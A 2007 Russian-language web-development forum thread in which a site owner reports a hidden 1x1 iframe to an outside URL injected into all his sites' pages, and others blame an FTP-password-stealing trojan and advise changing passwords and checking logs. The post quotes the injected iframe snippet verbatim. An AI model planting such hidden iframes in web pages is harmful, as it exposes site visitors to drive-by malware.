Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
PHP на примерах (2 издание). Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В. PHP. Практика создания Web-сайтов (второе издание). Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Разное

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: У меня появился iframe. Дибильный хак.
 
 автор: SHAman   (03.05.2007 в 11:55)   письмо автору
 
 

Вот мой сайт: http://anime.insyss.ru
С недавних пор он начал работать как-то не так. Он начал спрашиватьразрешение на запуск плагина. Я убрал окошко с запросом, а там в самом верху php-шная команда echo. Я не знаю от куда она взялась, но она там есть. Я залез в html и увидел это:

<body>echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 
height=1></iframe>";echo "";

От куда взялось - не знаю. А теперь внимание, вопросы:
1) От куда могло это появиться?
2) Куда жаловаться на этот сайт? Видимо, это именно он был инициатором хака?

Самое интересное, что в этом месте ничего не выводится скриптами и не инклюдится. То есть, это голых html! Еще обидней то, что похоже, хакал меня бот. Потому что любой нормальный человек запалил бы, что сайт написан на SSI+Perl. А у меня написано
echo "<iframe>......";

Самое интересное, что это не единственный мой сайт, где случилась такая беда. Причем, в другом месте я только что установил скрипты. Значит, это не может быть целенаправленной атакой на меня.

   
 
 автор: SHAman   (03.05.2007 в 12:46)   письмо автору
 
   для: SHAman   (03.05.2007 в 11:55)
 

БЛИН! Только что проверил все свои сайты - везде одно и то же!


<body>echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";echo "";


Даже в обычном html-файле!!!! ЭТО КАК??? Что, хостер напортачил что-ли? Или что? Все эти сайты висят на одном хостинге, что, сервак ломанули что-ли?

   
 
 автор: KPETuH   (03.05.2007 в 12:55)   письмо автору
 
   для: SHAman   (03.05.2007 в 12:46)
 

поменяёте пароль на фтп и почистите машину с которой конектитесь в фтп серверу скорее всего троян сидит и тырит пароли на фтп

   
 
 автор: SHAman   (03.05.2007 в 12:59)   письмо автору
 
   для: KPETuH   (03.05.2007 в 12:55)
 

Спасибо за совет, так и сделаю.

Вот только вопрос остался: кому нажаловаться, на нехороший сайт, который ставится iframe-ом?

   
 
 автор: cheops   (03.05.2007 в 13:04)   письмо автору
 
   для: SHAman   (03.05.2007 в 11:55)
 

>1) От куда могло это появиться?
Посмотрите логи FTP-доступа - нет ли левых обращений - если есть, то скорее всего троян упёр данные вашего FTP-аккаунта - сейчас это очень распространённая практика. Тащут откуда-то из штатов.

>2) Куда жаловаться на этот сайт? Видимо, это именно он был инициатором хака?
Владелец скажет, что не при делах... Максимум, что заказал раскрутку какой-нибудь безвестной группе, не подозревая о методах.

   
 
 автор: SHAman   (03.05.2007 в 13:08)   письмо автору
 
   для: cheops   (03.05.2007 в 13:04)
 

Спасибо. Написал все-таки, на всякий случай, хостеру. Пущай разбираются. Ща ставлю антивири в срочном порядке и поменяю пароли.

Всем спасибо.

   
 
 автор: DEM   (04.05.2007 в 01:00)   письмо автору
 
   для: SHAman   (03.05.2007 в 13:08)
 

Срочно меняйте все пароли от ФТП и больше не заходите на ФТП через ТОТАЛ КОММАНДЕР! (Ну и через ОСЛИК тож не желательно)... У вас троян который в англую тыритвсе пароли от ФТП и прочее-прочее... сам сталкивался (и вот те раз, тож сайт по АНИМЕ) и где-то в инете нашёл тему на форуме где такое обсуждалось (к сожалению ссылку уже забыл, но мои рекомендации взяты с их форума)

   
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования